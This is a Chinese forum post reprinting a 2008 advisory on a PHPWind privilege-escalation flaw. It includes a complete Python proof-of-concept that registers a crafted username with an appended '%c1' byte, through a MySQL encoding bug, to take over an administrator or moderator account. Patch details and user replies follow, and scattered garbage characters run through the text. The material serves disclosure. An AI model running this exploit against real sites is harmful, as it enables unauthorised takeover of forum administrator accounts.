[推荐] phpwind惊曝严重漏洞涉及所有版本

真我不改

中国站长站讯：本站从安全组织获悉，6月4日，国内知名的社区软件 PHPWIND所有版本又现严重漏洞。黑客利用该漏洞可导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作。目前PHPWIND已经向用户紧急发出最新安全补丁，广大站长及时下载与更新补丁包，并通知身边的站长。 ; {0 h: M6 \+ |1 j7 t7 q
0 |/ }" B* D4 X. l/ R
详情：
$ C& A' A& ^+ h- U$ e0 |/ T* r" Y
漏洞发布：http://www.80sec.com/; \3 m, a$ p3 J/ i( [+ G3 N8 K7 F
  f: N+ d, N! D. d# k
漏洞作者：jianxin@80sec.com% U# C% P" ]3 u5 G) n. ^

/ J7 h. b+ [  j6 c, g3 \1 C+ E, R1 L漏洞厂商： http://www.phpwind.com/* o2 R+ b1 K# S7 C7 f  h4 t
PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。5 D  ]# l  C% K% G, }7 H. ^
本漏洞影响phpwind所有版本
/ e( n  u& p. ~* c4 C0 v" @3 l/ ?: U; [+ P) K
漏洞危害：高
( ]3 s. E4 g5 ]2 W# ~& ~
- N3 l+ A' @) J( n& U4 @0 ~漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作
& |! L: w9 P/ r
# R8 i5 |7 c, r6 L6 V5 a* T' i利用方式：http://www.80sec.com有提供exploit) ]- \& E1 V- p

5 j) O& `$ a6 v; v/ o漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心构造的数据注册用户即可获得管理权限
/ w4 m9 `( V. R
/ y! f7 V* @6 h2 r/ Y漏洞修补：建议关闭注册功能等待官方出补丁
$ W4 Y/ N( Z$ f2 V& x& c8 e  Y. e+ x$ U" J- Z2 |: J4 d
漏洞状态：08.5.25发现此漏洞" F4 H; ?; K4 V0 ]; f! Y
08.6.1由80sec.com公开此漏洞# x9 F. _) U: y
已发补丁
# n8 A0 s2 a& Z$ D+ H6 ]
% |9 [/ J0 T7 ~" ?& j漏洞测试：

1. # -*- coding: gb2312 -*-
   
2. import urllib2,httplib,sys
   
3. httplib.HTTPConnection.debuglevel = 1
   
4. cookies = urllib2.HTTPCookieProcessor()
   
5. opener = urllib2.build_opener(cookies)
   
6. 
   
7. 
   
8. def banner():
   
9. print ""
   
10. print "########################################################"
    
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
    
12. print "Copyright (C) 2006"
    
13. print "jianxin@80sec.com"
    
14. print "80sec是一个新的致力于web安全的小团体"
    
15. print "http://www.80sec.com"
    
16. 
    
17. def usage():
    
18. banner()
    
19. print "Usage:n"
    
20. print " $ ./phpwind.py pwforumurl usertoattackn"
    
21. print " pwforumurl 目标论坛地址如http://www.80sec.com/"
    
22. print " usertoattack 目标拥有权限的斑竹或管理员"
    
23. print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
    
24. print " 最新版本可以使用uid登陆"
    
25. print " 其他版本可以使用cookie+useragent登陆"
    
26. print "########################################################"
    
27. print ""
    
28. 
    
29. 
    
30. argvs=sys.argv
    
31. usage()
    
32. 
    
33. 
    
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
    
35. pwurl = "%s/register.php" % argvs[1]
    
36. 
    
37. request = urllib2.Request(
    
38. url = pwurl ,
    
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
    
40. data = data)
    
41. 
    
42. f=opener.open(request)
    
43. headers=f.headers.dict
    
44. cookie=headers["set-cookie"]
    
45. try:
    
46. if cookie.index('winduser'):
    
47. print "Exploit Success!"
    
48. print "Login with uid password @80sec or Cookie:"
    
49. print cookie
    
50. print "User-agent: 80sec owned this"
    
51. except:
    
52. print "Error! http://www.80sec.com"
    
53. print "Connect root#80sec.com"

复制代码

PHPWind Forums 20080601 补丁发布（最后更新：20080601）5 h& l7 z! S" A  o
重要性等级：高！推荐广大站长及时下载与更新补丁包，并通知身边的站长。
. l8 P8 S5 s# i# k' N2 L; I适用范围：数据库使用 mysql 4.1 以上版本
+ y' {" y# ^7 o: E$ C" D问题描述：由MySQL一个编码Bug产生的安全隐患，威胁到网站的安全运行。5 l' r. t5 g8 h5 e' H

$ m) ?& q5 H% J" g
( u; W* U9 d; K5 [. V+ }& U补丁发布地址http://www.phpwind.net/read-htm-tid-616824.html

不知道楼上的是否知道，这个问题是由mysql  bug产生，人家在第一时间修复了问题，又不是什么大不了的漏洞。上个月，discuz官方网站不是还被人黑了么，人家对手也没到处去宣传，你们何苦呢！

这个剑心是discuz的。。。这帮人真是瞎搞。

jackniu

呵呵，，，discuz也出过这个问题，，呵呵